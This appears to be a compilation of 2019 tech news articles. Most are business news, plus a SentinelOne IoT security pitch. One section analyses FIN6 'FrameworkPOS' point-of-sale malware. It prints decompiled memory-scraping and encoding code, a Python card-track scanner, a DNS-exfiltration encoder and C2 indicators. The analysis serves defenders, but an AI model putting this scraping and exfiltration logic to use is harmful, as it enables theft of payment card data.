Facebook has acquired Servicefriend, which builds ‘hybrid’ chatbots, for Calibra customer service

As Facebook prepares to launch its new cryptocurrency Libra in 2020, it’s putting the pieces in place to help it run. In one of the latest developments, it has acquired Servicefriend, a startup that built bots — chat clients for messaging apps based on artificial intelligence — to help customer service teams, TechCrunch has confirmed.

The news was first reported in Israel, where Servicefriend is based, after one of its investors, Roberto Singler, alerted local publication The Marker about the deal. We reached out to Ido Arad, one of the co-founders of the company, who referred our questions to a team at Facebook. Facebook then confirmed the acquisition with an Apple-like non-specific statement:

“We acquire smaller tech companies from time to time. We don’t always discuss our plans,” a Facebook spokesperson said.

Several people, including Arad and his co-founder Shahar Ben Ami, indicate on their LinkedIn profiles that they now work at Facebook within the Calibra digital wallet group, as does at least one other employee. Their jobs at the social network started this month, meaning this acquisition closed in recent weeks. (Several others still list Servicefriend as their employer, though they too may have made the move.)

Although Facebook isn’t specifying what they will be working on, the most obvious area will be in building a bot — or more likely, a network of bots — for the customer service layer for the Calibra digital wallet that Facebook is developing.

Facebook’s plan is to build a range of financial services for people to use Calibra to pay out and receive Libra — for example, to send money to contacts, pay bills, top up their phones, buy things and more.

It remains to be seen just how much people will trust Facebook as a provider of all of these services. That is where a “human,” accessible customer service experience will be essential.

“We are here for you,” Calibra notes on its welcome page, where it promises 24-7 support in WhatsApp and Messenger for its users.


Servicefriend has worked on Facebook’s platform in the past: specifically, it built “hybrid” bots for Messenger that companies could use to complement their human teams and better scale their services on messaging platforms. In one Messenger bot that Servicefriend built for Globe Telecom in the Philippines, the hybrid approach brought “agent hours” down to under 20 hours for each 1,000 customer interactions.

Bots have been a relatively problematic area for Facebook. The company launched a personal assistant called M in 2015, and then, in 2016, bots on Messenger that let users talk to businesses, both with considerable fanfare. The reality, though, was that nothing worked as well as promised, and in some cases the bots performed significantly worse than the services they aimed to replace.

While AI-based assistants such as Alexa have become synonymous with how a computer can carry on a conversation and provide information to humans, the consensus around bots these days is that the most workable way forward is to build services that complement, rather than completely replace, teams.

For Facebook, getting its customer service on Calibra right can help it build and expand its credibility (note: another area where Servicefriend has built services is in using customer service as a marketing channel). Getting it wrong could mean issues not just with customers, but with partners and possibly regulators.

Chef CEO says he’ll continue to work with ICE in spite of protests

Yesterday, software development tool maker Chef found itself in the middle of a firestorm after a tweet called the company out for doing business with DHS/ICE. The controversy eventually led an influential open-source developer to remove a couple of key pieces of software from the project, bringing down parts of Chef’s commercial business.

Chef intends to fulfill its contract with ICE, in spite of calls to cancel it. In a blog post published this morning, Chef CEO Barry Crist defended the decision. “I do not believe that it is appropriate, practical, or within our mission to examine specific government projects with the purpose of selecting which U.S. agencies we should or should not do business.”

He stood by the company’s decision this afternoon in an interview with TechCrunch, while acknowledging that it was a difficult and emotional decision for everyone involved. “For some portion of the community, and some portion of our company, this is a super, super-charged lightning rod, and this has been very difficult. It’s something that we spent a lot of time on, and I want to represent that there are portions of [our company] that do not agree with this, but I as a leader of the company, along with the executive team, made a decision that we would honor the contracts and those relationships that were formed and work with them over time,” he said.

He added, “I think our challenge as leadership right now is how do we collectively navigate through times like this, and through emotionally-charged issues like the ICE contract.”

The deal with ICE, a $95,000-a-year contract for software development tools, dates back to the Obama administration, when the then-DHS CIO wanted to move the department toward more modern agile/DevOps development workflows, according to Crist.

He said that for people who might think it’s a purely economic decision, the money represents a fraction of the company’s more than $50 million in annual revenue (according to Crunchbase data); rather, it’s about a long-term business arrangement with the government that transcends individual administrations’ policies. “It’s not about the $100,000, it’s about decisions we’ve made to engage the government. And I appreciate that not everyone in our world feels the same way or would make that same decision, but that’s the decision that we made as a leadership team,” Crist said.

Shortly after word of Chef’s ICE contract appeared on Twitter, according to a report in The Register, former Chef employee Seth Vargo removed a couple of key pieces of open-source software from the repository, telling The Register that “software engineers have to operate by some kind of moral compass.” The move brought down part of Chef’s commercial software, and it took the company 24 hours to fully restore those services, according to Chef CTO Corey Scobie.

Crist says he wants to be clear that his decision does not mean he supports current ICE policies. “I certainly don’t want to be viewed as I’m taking a strong stand in support of ICE. What we’re taking a strong stand on is our consistency with working with our customers, and again, our work with DHS started in the previous administration on things that we feel very good about,” he said.

The Good, the Bad and the Ugly in Cybersecurity – Week 38


The Good

“We have to get over our fear of embracing external experts to help us be secure. We are still carrying cybersecurity procedures from the 1990s.” -Will Roper, Assistant Secretary of the Air Force for acquisition

The US Air Force is quickly changing its philosophy (and reaping great rewards by doing so) by inviting hackers to crack core operational systems and weapons platforms. Initial success came earlier this year when hackers discovered major mission-critical vulnerabilities in the high-profile F-15 fighter jet; it was the first time any outside talent was invited to crack into the TADS and other systems of the aircraft. The immense success of that event, along with the success of the Air Force’s bug bounty program and the Aviation Village at DEF CON, brings us to today’s “Good”: next up is a satellite in orbit, with hackers invited to attack either the bird or the ground station control systems in order to uncover vulnerabilities that an otherwise closed development lifecycle simply won’t surface.

The Bad

A report by Marsh and Microsoft, the “2019 Global Cyber Risk Perception Survey,” brings mostly bad news: of all business risks, cyber risks outrank all others by 20%, with 79% of respondents calling them a top risk, even over today’s economic uncertainty amid a trade war and inverted yield curves. That’s bad: if cybersecurity solutions were effective, cyber risk would not be a top concern. Worse, the report shows that confidence declined in three critical areas of “cyber resilience”: 18% of respondents said they had no confidence in understanding and assessing cyber risks (up from 9% two years ago), and 19% of leaders had no confidence in preventing cyber threats (up 7 percentage points). Worst of all, 2 out of 10 respondents said they had no confidence in their organization’s ability to respond to and recover from cyber events such as ransomware, fast-moving worms and sensitive data breaches.

Question: Of the following business threats, please rank the top 5 that are the biggest concerns to your organization:


Simply put: because legacy controls and a focus on ‘resilience’ over prevention have not been working these last 4-5 years (and in fact results have been getting worse), the C-suite is more worried than ever about cyber risk to the business, life and safety, brand and reputation, and mission.

The Ugly

The same folks that sponsored The Bad managed to break themselves: Microsoft. This time, a Microsoft patch broke the ability to perform manual or scheduled Microsoft Defender scans on the Microsoft OS. But more ironic than that? The patch was needed because Microsoft System File Checker (SFC), which had been broken since early this summer, was flagging internal Microsoft Windows PowerShell files within Microsoft Defender as malformed. Some in the community point out that Microsoft keeps breaking things when it tries to fix them, but they are missing the point: using Microsoft components that depend on Microsoft components to secure Microsoft components is like asking your foot doctor to perform brain surgery on himself, using his foot. It has never been a good idea, it never will be, and the manifestations of this very bad idea will play out in real life indefinitely, and by design. This is not a philosophical conundrum; it is just the entropy of complex, self-referencing, self-authored, self-conflicted software playing out as it must.

 


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google is investing $3.3B to build clean data centers in Europe

Google announced today that it was investing 3 billion euro (approximately $3.3 billion USD) to expand its data center presence in Europe. What’s more, the company pledged the data centers would be environmentally friendly.

This new investment is in addition to the $7 billion the company has invested since 2007 in the EU, but today’s announcement was focused on Google’s commitment to building data centers running on clean energy, as much as the data centers themselves.

In a blog post announcing the new investment, CEO Sundar Pichai made it clear that the company is focused on running these data centers on carbon-free fuels, pointing out that he was in Finland today to discuss building sustainable economic development in conjunction with a carbon-free future with Prime Minister Antti Rinne.

Of the 3 billion euros the company plans to spend, it will invest 600 million to expand its presence in Hamina, Finland, which he wrote “serves as a model of sustainability and energy efficiency for all of our data centers.” Further, the company announced 18 new renewable energy deals earlier this week, encompassing a total of 1,600 megawatts in the US, South America and Europe.

In the blog post, Pichai outlined how the new data center projects in Europe would include some of these previously announced projects:

Today I’m announcing that nearly half of the megawatts produced will be here in Europe, through the launch of 10 renewable energy projects. These agreements will spur the construction of more than 1 billion euros in new energy infrastructure in the EU, ranging from a new offshore wind project in Belgium, to five solar energy projects in Denmark, and two wind energy projects in Sweden. In Finland, we are committing to two new wind energy projects that will more than double our renewable energy capacity in the country, and ensure we continue to match almost all of the electricity consumption at our Finnish data center with local carbon-free sources, even as we grow our operations.

The company is also investing in new skills training, so people will have the tools to handle the new types of jobs these data centers and other high-tech work will require. The company claims it has previously trained 5 million people in Europe for free in crucial digital skills, and recently opened a Google skills hub in Helsinki.

It’s obviously not a coincidence that the company is making an announcement related to clean energy on Global Climate Strike Day, a day when people from around the world are walking out of schools and off their jobs to encourage world leaders and businesses to take action on the climate crisis. Google is attempting to answer the call with these announcements.

Vianai emerges with $50M seed and a mission to simplify machine learning tech

You don’t see a startup get a $50 million seed round all that often, but such was the case with Vianai, an early stage startup launched by Vishal Sikka, former Infosys managing director and SAP executive. The company launched recently with a big check and a vision to transform machine learning.

Just this week, the startup had a coming out party at Oracle Open World where Sikka delivered one of the keynotes and demoed the product for attendees. Over the last couple of years, since he left Infosys, Sikka has been thinking about the impact of AI and machine learning on society and the way it is being delivered today. He didn’t much like what he saw.

It’s worth noting that Sikka got his Ph.D. from Stanford with a specialty in AI in 1996, so this isn’t something that’s new to him. What’s changed, as he points out, is the growing compute power and increasing amounts of data, all fueling the current AI push inside business. What he saw when he began exploring how companies are implementing AI and machine learning today, was a lot of complex tooling, which in his view, was far more complex than it needed to be.

He saw dense Jupyter notebooks filled with code. He said that if you looked at a typical machine learning model, and stripped away all of the code, what you found was a series of mathematical expressions underlying the model. He had a vision of making that model-building more about the math, while building a highly visual data science platform from the ground up.

The company has been iterating on a solution over the last year with two core principles in mind: explorability and explainability, which involves interacting with the data and presenting it in a way that helps the user attain their goal faster than the current crop of model-building tools.

“It is about making the system reactive to what the user is doing, making it completely explorable, while making it possible for the developer to experiment with what’s happening in a way that is incredibly easy. To make it explainable means being able to go back and forth with the data and the model, using the model to understand the phenomenon that you’re trying to capture in the data,” Sikka told TechCrunch.

He says the tool isn’t just aimed at data scientists; it’s about business users and data scientists sitting down and iterating together to get the answers they are seeking, whether it’s finding a way to reduce user churn or discover fraud. These models do not live in a data science vacuum. They all have a business purpose, and he believes the only way to be successful with AI in the enterprise is to have both business users and data scientists sitting together at the same table, working with the software to solve a specific problem while taking advantage of one another’s expertise.

For Sikka, this means refining the actual problem you are trying to solve. “AI is about problem solving, but before you do the problem solving, there is also a [challenge around] finding and articulating a business problem that is relevant to businesses and that has a value to the organization,” he said.

He is very clear, that he isn’t looking to replace humans, but instead wants to use AI to augment human intelligence to solve actual human problems. He points out that this product is not automated machine learning (AutoML), which he considers a deeply flawed idea. “We are not here to automate the jobs of data science practitioners. We are here to augment them,” he said.

As for that massive seed round, Sikka knew it would take a big investment to build a vision like this, and with his reputation and connections, he felt it would be better to get one big investment up front so he could concentrate on building the product and the company. He says he was fortunate enough to have investors who believe in the vision, even though, as he says, no early business plan survives the test of reality. He didn’t name specific investors, referring only to friends and wealthy and famous individuals and institutions. A company spokesperson reiterated that they were not revealing a list of investors at this time.

For now, the company has a new product and plenty of money in the bank to get to profitability, which he states is his ultimate goal. Sikka could have taken a job running a large organization, but like many startup founders, he saw a problem, and he had an idea how to solve it. That was a challenge he couldn’t resist pursuing.

FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

The Zero2Hero malware course continues with Vitali Kremez diving into the FIN6 “FrameworkPOS”, targeting payment card data from Point-of-Sale (POS) or eCommerce systems.

Point-of-sale (POS) malware remains an active threat for financial cybercrime. POS malware targets systems that run physical point-of-sale devices, operating by inspecting process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date and other information stored on a card’s magnetic stripe. Some of the most prolific recent POS malware families include “AlinaPOS”, “GlitchPOS” and “FrameworkPOS”.

After a credit card is scanned in real time, the personal account number (PAN) and accompanying data sit unencrypted in the point-of-sale system’s memory while the system determines where to send them for authorization. During that window, the point-of-sale malware scans the process memory for elements related to credit card information.
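
Track2 data has a well-documented layout, which is what memory scrapers pattern-match against. As a rough illustration of the idea, here is an analyst-side sketch in Python (this is not FrameworkPOS’s own logic; the field widths are the commonly documented ones and the sample bytes are synthetic):

```python
import re

# Track2 layout: PAN (13-19 digits), '=' separator, YYMM expiry,
# 3-digit service code, then discretionary data. The real malware walks
# raw process memory with hand-rolled byte checks rather than a regex.
TRACK2_RE = re.compile(rb";?(\d{13,19})=(\d{4})(\d{3})(\d*)\??")

def scan_buffer(buf: bytes):
    """Return (pan, expiry, service_code) tuples found in a memory buffer."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan, expiry, svc, _discretionary = m.groups()
        hits.append((pan.decode(), expiry.decode(), svc.decode()))
    return hits

# Synthetic (test) card number embedded in junk bytes:
sample = b"\x00\x12junk;4111111111111111=24091011234567890?\xff\xfe"
print(scan_buffer(sample))  # [('4111111111111111', '2409', '101')]
```
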

The FrameworkPOS malware and related variants have been linked to high-profile merchant breaches in the past, including the “MozartPOS” variant involved in the Home Depot intrusion.

POS malware becomes especially relevant during the fall shopping season (notably Black Friday), targeting various businesses dealing with live credit card transactions.

Click here to watch the full episode on Dissecting FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

“FrameworkPOS” Malware Internals

One of the more interesting POS malware families is “FrameworkPOS” and its variants (including those dubbed “GratefulPOS” and “MozartPOS”). The most recent sample was internally named “psemonitor_x64.dll”. FrameworkPOS, also known as TRINITY, was previously linked to the financially motivated hacking collective called FIN6.

Some of the newly spotted FIN6 FrameworkPOS malware variants reveal that the group utilizes a 64-bit build with two export functions, “workerIntstance” and “debugPoint”.


Notably, the FrameworkPOS malware continues to have a low detection ratio on VirusTotal: as of September 18, 2019, only 9 of 66 antivirus engines treat the malware as even suspicious.

For malware analysis purposes, we also analyze an earlier FrameworkPOS version that carries the purported “grp1” campaign identifier and contains debug Track 2 data, presumably for testing purposes.

The FrameworkPOS main function flow, pseudo-coded in C++ below, runs from creating the “caller” thread (which builds out the communication protocol and resolves necessary host information) through the process-scanning loop.

The excerpt of the main malware functionality is as follows:

    // Spin up the "caller" thread, which handles C2 communication setup
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)caller, 0, 0, 0);

    while ( 1 )
    {
      time(&v11);
      // Snapshot all running processes (2 == TH32CS_SNAPPROCESS)
      hSnapshot = CreateToolhelp32Snapshot(2u, 0);
      if ( hSnapshot == (HANDLE)-1 )
        return 0;
      pe.dwSize = 296;

      if ( !Process32First(hSnapshot, &pe) )
        break;
      do
      {
        v8 = 0;
        // Skip processes found in the hardcoded 0x14-entry blacklist
        for ( j = 0; j < 0x14; ++j )
        {
          if ( !strcmp(pe.szExeFile, &aWininit_exe[24 * j]) || strstr(byte_592010, pe.szExeFile) )
          {
            v8 = 1;
            break;
          }
        }
        if ( !v8 )
        {
          if ( pe.th32ProcessID )
          {
            dwProcessId = pe.th32ProcessID;
            v14 = 1;
            dword_592514 = 0;
            byte_59136B = 0;
            // Map the target process's memory regions...
            v89 = check_virtualQuery_ex(pe.th32ProcessID, 1);
            if ( v89 )
            {
              // ...and scrape them for Track1/Track2 card data
              scan_memoryfor_card((int)v89);
              free((int)v89);
              _sleep(200u);
            }
          }
        }
      }
      while ( Process32Next(hSnapshot, &pe) );
      if ( dword_592410 > 0 )
        _sleep(10000u);
      CloseHandle(hSnapshot);
      time(&v15);
      v15 -= v11;
      localtime(&v15);
    }

When it gets to memory scraping, the malware skips a blacklist of processes such as “wininit.exe” in order to speed up the card scan logic.
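
The blacklist check in the decompiled loop above is simple to mirror. A hypothetical sketch in Python (the process names beyond wininit.exe are invented for illustration; the real table holds 0x14 fixed-width entries):

```python
# Hypothetical subset of the blacklist: system processes that will never
# hold card data, so scraping them would only waste time.
BLACKLIST = {"wininit.exe", "smss.exe", "csrss.exe", "lsass.exe"}

def should_scan(process_name: str) -> bool:
    """Mirror of the decompiled check: skip blacklisted processes so the
    scraper spends its time only on candidates that may hold card data."""
    return process_name.lower() not in BLACKLIST

print(should_scan("pos_terminal.exe"))  # True
print(should_scan("wininit.exe"))       # False
```
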

Credit Card Scraping Logic & Luhn Algorithm

The malware also validates card information by checking purported track data for the known prefixes “4” (Visa), “5” (Mastercard), “6” (Discover), “34” and “37” (Amex), and “36” and “300-305” (Diners Club), and by running the Luhn algorithm against candidate numbers.
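
The Luhn check itself is a simple mod-10 checksum, and a reference implementation is handy when validating recovered track data. A straightforward Python version (not the malware’s own code):

```python
def luhn_valid(pan: str) -> bool:
    """Mod-10 (Luhn) check: double every second digit from the right,
    subtract 9 from doubled values above 9, and require sum % 10 == 0."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

print(luhn_valid("4111111111111111"))  # True: a well-known Visa test number
print(luhn_valid("4111111111111112"))  # False
```
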


The x64 malware version also contains an altered, “greedier” version of the Track1/Track2 scanner logic, focusing less on static card prefixes and service codes and instead matching any data that looks like Track1/Track2.


FrameworkPOS Data Encoding: XOR & Obfuscation

Throughout its execution, the malware builds some notable strings by XORing a byte section in a loop, *(&byte_memory++) ^= 0x4D (via a sequence of mov, xor, shl and movsx instructions). Malware coders often build string paths this way to bypass some static anti-virus detection.
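
Recovering such XOR-built strings during analysis just means re-applying the key. A small helper, with the example path invented for illustration (real samples would supply the raw bytes lifted from the binary):

```python
KEY = 0x4D

def xor_decode(blob: bytes, key: int = KEY) -> str:
    """Undo the single-byte XOR loop (*(&byte_memory++) ^= 0x4D)."""
    return bytes(b ^ key for b in blob).decode("ascii")

# Encode a known plaintext first so the round trip is self-evident.
encoded = bytes(b ^ KEY for b in b"C:\\Windows\\Temp\\")
print(xor_decode(encoded))  # C:\Windows\Temp\
```
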


Notably, the FrameworkPOS malware obfuscates its stolen data by passing each string through a hardcoded substitution table, XORing each byte with the key 0xAA, and converting the result into hexadecimal via an _snprintf API call:

size_t __cdecl enc_func(char *a1, int a2)
{
  size_t result;
  unsigned int i;
  for ( len_enc = 0; ; ++len_enc )
  {
    result = strlen(a1);
    if ( len_enc >= result )
      break;
    // Substitute the byte through the hardcoded lookup tables
    for ( i = 0; i < 69; ++i )
    {
      if ( (unsigned __int8)a1[len_enc] == byte_42E000[i] )
      {
        a1[len_enc] = byte_42E048[i];
        break;
      }
    }
    // XOR with the 0xAA key, then emit the byte as two hex characters
    a1[len_enc] ^= AA_key;
    _snprintf((char *)(a2 + 2 * len_enc), 2u, "%.2x", (unsigned __int8)a1[len_enc]);
  }
  return result;
}

The XOR key function locations are as follows:
-------        --------         
Address        Function                                 
-------        --------             
.text:004030DB notice_write_func  
.text:00403847 memory_parser 
.text:00403873 memory_parser 
.text:004039DE memory_parser     
.text:00406C43 computer_name_gen

Command & Control (C2) Protocol

Notably, the FrameworkPOS malware variant leverages hex encoding with a 0xAA XOR byte key for exfiltrated data, carried in ping requests as part of a domain name system (DNS) exfiltration protocol.

Credit: @malz_intel
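
Setting aside the substitution-table step, the per-byte pipeline mirrors the enc_func shown earlier: XOR with 0xAA, hex-encode, and pack the result into DNS labels. A sketch of an encode/decode pair (the domain name and label-size handling here are assumptions for illustration, not taken from the sample):

```python
XOR_KEY = 0xAA
MAX_LABEL = 63  # DNS labels are capped at 63 characters

def encode_exfil(data: bytes, domain: str = "ns.example.com") -> str:
    """XOR each byte with 0xAA, hex-encode, and pack into DNS labels."""
    hexed = "".join(f"{b ^ XOR_KEY:02x}" for b in data)
    labels = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    return ".".join(labels + [domain])

def decode_exfil(query: str, domain: str = "ns.example.com") -> bytes:
    """Recover the stolen bytes from a captured DNS query name."""
    hexed = query[: -(len(domain) + 1)].replace(".", "")
    return bytes(int(hexed[i:i + 2], 16) ^ XOR_KEY for i in range(0, len(hexed), 2))

q = encode_exfil(b"4111111111111111=2409101")
print(q)
print(decode_exfil(q))
```

A defender watching DNS logs would look for exactly this shape: long, high-entropy hex labels queried against a single authoritative domain.
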

Indicators of Compromise (IOCs):

FrameworkPOS x86 SHA-256: 81cea9fe7cfe36e9f0f53489411ec10ddd5780dc1813ab19d26d2b7724ff3b38

FrameworkPOS x64 SHA-256: 7a207137e7b234e680116aa071f049c8472e4fb5990a38dab264d0a4cde126df

C2:

ns[.]akamai1811[.]com

ns[.]a193-45-3-47-deploy-akamaitechnologies[.]com




New Relic launches platform for developers to build custom apps

When Salesforce launched Force.com in 2007 as a place for developers to build applications on top of Salesforce, it was a pivotal moment for the concept of SaaS platforms. Since then, it’s been said that every enterprise SaaS company wants to be a platform play. Today, New Relic achieved that goal when it announced the New Relic One Observability Platform at the company’s FutureStack conference in New York City.

Company co-founder and CEO Lew Cirne explained that a platform, by definition, is something other people can build software on. “What we are shipping is a set of capabilities to enable our customers and partners to build their own observability applications on the very same platform that we’ve built our product,” Cirne told TechCrunch.

He sees these third-party developers building applications to enable additional innovations on top of the New Relic platform that perhaps New Relic’s engineers couldn’t because of time and resource constraints. “There are so many use cases for this data, far more than the engineers that we have at our company could ever do, but a community of people who can do this together can totally unlock the power of this data,” Cirne said.

Like many platform companies, New Relic found that as it expanded its own offering, it needed a common set of services its developers could build on; having built that platform internally, it could then open the same set of services to external developers that its own engineering team uses.

“What we have is metrics, logs, events and traces coming from our customers’ digital software. So they have access to all that data in real time to build applications, measure the health of their digital business and build applications on top of that. Just as Force.com was the thing that really transformed Salesforce as a company into being a strategic vendor, we think the same thing will happen for us with what we’re offering,” he said.

As a proof point for the platform, the company is releasing a dozen open-source tools built on top of the New Relic platform today in conjunction with the announcement. One example is an application to help identify where companies could be over-spending on their AWS bills. “We’re actually finding 30-40% savings opportunities for them where they’re provisioning larger servers than they need for the workload. Based on the data that we’re analyzing, we’re recommending what the right size deployment should be,” Cirne said.

The New Relic One Observability Platform and the 12 free apps will be available starting today.

Quilt Data launches from stealth with free portal to access petabytes of public data

Quilt Data‘s founders, Kevin Moore and Aneesh Karve, have been hard at work for the last four years building a platform to search for data quickly across vast repositories on AWS S3 storage. The idea is to give data scientists a way to find data in S3 buckets, then package that data in forms that a business can use. Today, the company launched out of stealth with a free data search portal that not only proves what they can do, but also provides valuable access to 3.7 petabytes of public data across 23 S3 repositories.

The public data repository includes publicly available Amazon review data along with satellite images and other high-value public information. The product works like any search engine, where you enter a query, but instead of searching the web or an enterprise repository, it finds the results in S3 storage on AWS.

The results include not only the data you are looking for, but also all of the information around the data, such as Jupyter notebooks, the standard workspace that data scientists use to build machine learning models. Data scientists can then use this as the basis for building their own machine learning models.

The public data, which includes more than 10 billion objects, is a resource that data scientists should greatly appreciate, but Quilt Data is offering access to this data out of more than pure altruism. It’s doing so because it wants to show what the platform is capable of, and in the process hopes to get companies to use the commercial version of the product.


Quilt Data search results with data about the data found (Image: Quilt Data)

Customers can try Quilt Data for free or subscribe to the product in the Amazon Marketplace. The company charges a flat rate of $550 per month for each S3 bucket. It also offers an enterprise version with priority support, custom features and education and on-boarding for $999 per month for each S3 bucket.

The company was founded in 2015 and was a member of the Y Combinator Summer 2017 cohort. The company has received $4.2 million in seed money so far from Y Combinator, Vertex Ventures, Fuel Capital and Streamlined Ventures, along with other unnamed investors.

Yes, Your IoT Needs Security, Too

Gartner predicted that by the end of 2020 about 25% of attacks on enterprises will involve IoT devices. But investment in IoT security will not measure up to this risk level and is expected to account for only 10% of security spending, as organizations will likely prefer usability over security. The characteristics of traditional IoT security solutions will also hamper adoption, as these are usually cumbersome, expensive and don’t scale well.

IoT Devices Add to the Existing Number of Endpoints

If Gartner’s predictions about future trends seem vague, look instead at the recent warning from Microsoft about Russian hackers breaching secured networks using simple IoT devices. And this is just the beginning. Today there are 27 billion IoT devices; that number is expected to grow to 125 billion by as soon as 2030.

Many of these IoT devices will find their way into enterprises and onto enterprise networks, in the form of smart assistants (such as Alexa), IP cameras, smart thermostats and other devices, all aimed at increasing convenience and productivity. However, these devices also significantly increase an organization’s attack surface, adding to the burden of securing the most common IT device: the endpoint.

The Challenges of Securing IoT devices in the Corporate Environment

IoT devices and endpoints are similar in some ways – they are connected to the enterprise network, they have an IP address, and some computing power (depending on the type and functionality). But unlike endpoints, IoT devices are usually not deployed in the same planned and organized manner, they are not built with security in mind, and they cannot be installed with proper endpoint protection solutions due to their limited nature (memory size, type of OS, computing power).

Often, these “smart” devices are “rogue” or “shadow IT” devices, meaning they are brought in from outside the organization without the IT department’s knowledge or supervision and are connected to the network over Wi-Fi, Bluetooth or another communication protocol, which makes them “transparent” to network monitoring tools. So the first challenge is to discover all these devices. The second challenge is to enforce organizational security and privacy policies regarding these devices (which is impossible to do if you haven’t even detected them). Last but not least, the organization needs to monitor these devices, identify suspicious behavior and respond if such activity is detected.

Existing Solutions Fall Short

Existing security products on the market try to tackle these challenges either by monitoring network traffic or by installing software agents on the devices themselves. The first approach usually requires adding physical appliances to the network and directing traffic through them. Other products capture the traffic and upload logs to a server for processing. Both methods are difficult to implement and don’t scale well for organizations with multiple sites and network types. Deploying software agents on the devices themselves is even more impractical – it is possible only for a very limited range of devices (e.g., security cameras), it does not scale, and it does not address the “shadow” element, in which users bring unsupervised devices onto the network.

The SentinelOne Solution – IoT Discovery and Enforcement

To better protect enterprises from the threat of IoT devices, SentinelOne took a different path: leveraging existing endpoint security agents as sensors, effectively turning every protected endpoint into a network detection device capable of identifying and controlling every IoT and connected device on a network. Utilizing endpoint security agents obviates the need to install additional equipment, simplifying deployment. Once in use, the Ranger IoT security module identifies all connected devices and presents them to security analysts. Every new device that connects to the network is identified and added to the list of monitored devices.

Since it’s not enough to simply know a device is on your network, the system fingerprints each device according to its operating system and role. Devices are then presented by category (printers, mobile devices, Linux servers, and so on). Fingerprinting also enables alerting when a device is unmanaged or compromised, as it will behave differently from other devices in the same category.
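This kind of fingerprint-based categorization and peer-comparison alerting can be illustrated with a toy example. The category names, fingerprint fields and traffic metric below are assumptions for illustration only; a robust median-based rule is used so the outlier cannot mask itself by inflating the baseline:

```python
# Toy sketch of device fingerprinting and per-category anomaly flagging.
# Categories, fingerprint fields and the kbps metric are illustrative.
from statistics import median

def categorize(device):
    """Assign a coarse category from a device's (os, role) fingerprint."""
    if device["role"] == "printer":
        return "printers"
    if device["os"] == "linux" and device["role"] == "server":
        return "linux-servers"
    return "other"

def flag_outliers(devices, threshold=10.0):
    """Flag devices whose traffic deviates strongly from category peers."""
    by_cat = {}
    for d in devices:
        by_cat.setdefault(categorize(d), []).append(d)
    flagged = []
    for peers in by_cat.values():
        if len(peers) < 3:
            continue  # too few peers to establish a baseline
        traffic = [p["kbps"] for p in peers]
        med = median(traffic)
        mad = median(abs(t - med) for t in traffic)  # robust spread
        for p in peers:
            if abs(p["kbps"] - med) > threshold * max(mad, 1.0):
                flagged.append(p["name"])
    return flagged

fleet = [
    {"name": "prn-1", "os": "rtos", "role": "printer", "kbps": 5},
    {"name": "prn-2", "os": "rtos", "role": "printer", "kbps": 6},
    {"name": "prn-3", "os": "rtos", "role": "printer", "kbps": 4},
    {"name": "prn-4", "os": "rtos", "role": "printer", "kbps": 900},
]
print(flag_outliers(fleet))  # → ['prn-4']
```

A printer pushing two orders of magnitude more traffic than its peers stands out immediately, which is exactly the intuition behind alerting on a device that "acts differently than other devices of the same category."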

Providing security teams with complete visibility, categorization and alerting on rogue devices and vulnerabilities – all from the same management console and without having to install additional systems – is the best way to ensure that enterprises proactively prepare for the imminent threat posed by IoT devices.



Salesforce is building an app to gauge a company’s sustainability progress

Salesforce has always tried to be a socially responsible company, encouraging employees to work in the community, giving 1% of its profits to different causes and building and productizing the 1-1-1 philanthropic model. The company now wants to help other organizations be more sustainable to reduce their carbon footprint, and today it announced it is working on a product to help.

Patrick Flynn, VP of sustainability at Salesforce, says that it sees sustainability as a key issue, and one that requires action right now. The question was how Salesforce could help. As a highly successful software company, it decided to put that particular set of skills to work on the problem.

“We’ve been thinking about how can Salesforce really take action in the face of climate change. Climate change is the biggest, most important and most complex challenge humans have ever faced, and we know right now, every individual, every company needs to step forward and do everything it can,” Flynn told TechCrunch.

And to that end, the company is developing the Salesforce Sustainability Cloud to help track a company’s sustainability efforts. The tool should look familiar to Salesforce customers, but instead of tracking customers or sales, it tracks carbon emissions, renewable energy usage and how well a company is meeting its sustainability goals.

Sustainability dashboards (Image: Salesforce)

The tool works with internal data and third-party data as needed, and is subject to both an internal audit by the Sustainability team and third-party organizations to be sure that Salesforce (and Sustainability Cloud customers) are meeting their goals.

Salesforce has been using this product internally to measure its own sustainability efforts, which Flynn leads. “We use the product to measure our footprint across all sorts of different aspects of our operations from data centers, public cloud, real estate — and we work with third-party providers everywhere we can to have them make their operations cleaner, and more powered by renewable energy and less carbon intensive,” he said. When there is carbon generated, the company uses carbon offsets to finance sustainability projects such as clean cookstoves or helping preserve the Amazon rainforest.

Flynn says increasingly the investor community is looking for proof that companies are building a real, verifiable sustainability program, and the Sustainability Cloud is an effort to provide that information both for Salesforce and for other companies that are in a similar position.

The product is in beta now and is expected to be ready next year. Flynn could not say how much they plan to charge for this service, but he said the goal of the product is positive social impact.
